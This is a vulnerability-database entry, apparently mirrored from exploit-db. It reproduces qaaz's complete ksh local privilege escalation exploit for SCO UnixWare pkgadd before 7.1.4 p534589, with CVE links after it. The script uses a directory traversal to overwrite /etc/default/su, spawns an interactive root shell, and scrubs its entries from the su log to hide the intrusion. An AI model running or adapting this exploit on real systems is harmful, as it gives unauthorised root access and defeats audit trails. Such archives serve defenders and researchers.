Lucene search
QaazEDB-ID:5355HistoryApr 04, 2008 - 12:00 a.m.
SCO UnixWare < 7.1.4 p534589 - 'pkgadd' Local Privilege Escalation
2008-04-0400:00:00
qaaz
www.exploit-db.com
34
AI Score
7.4
Confidence
Low
#!/bin/ksh
#
# 04/2008: public release
# SCO UnixWare < 7.1.4 p534589
#
if [ `id -un` = 'root' ]; then
grep -v " $1-root\$" /var/adm/sulog >su.log
cp su.def /etc/default/su
cp su.log /var/adm/sulog
rm -f su.def su.log woot.log
else
echo "------------------------------------"
echo " UnixWare pkgadd Local Root Exploit"
echo " By qaaz"
echo "------------------------------------"
EVIL=`echo 'XX\nPROMPT=No\nXX'`
cp /etc/default/su su.def
ln -s /etc/default/su woot.log
PKGINST=../../../..`pwd`/woot /usr/sbin/pkgadd "$EVIL" 1>/dev/null 2>&1
su root -c "$0 `id -un`; /bin/sh -i"
fi
# milw0rm.com [2008-04-04]Related
securityvulns
securityvulns
SCO Unixware pkgadd directory traversal
2008-04-05 00:00:00
nvd
nvd
CVE-2008-0310
2008-04-07 17:44:00
CVE-2008-1343
2008-03-17 16:44:00
prion
prion
Directory traversal
2008-04-07 17:44:00
Directory traversal
2008-03-17 16:44:00
seebug
seebug
SCO UnixWare pkgadd本地权限提升漏洞
2008-04-09 00:00:00
cvelist
cvelist
CVE-2008-0310
2008-04-07 17:00:00
CVE-2008-1343
2008-03-17 16:00:00
cve
cve
CVE-2008-0310
2008-04-07 17:44:00
CVE-2008-1343
2008-03-17 16:44:00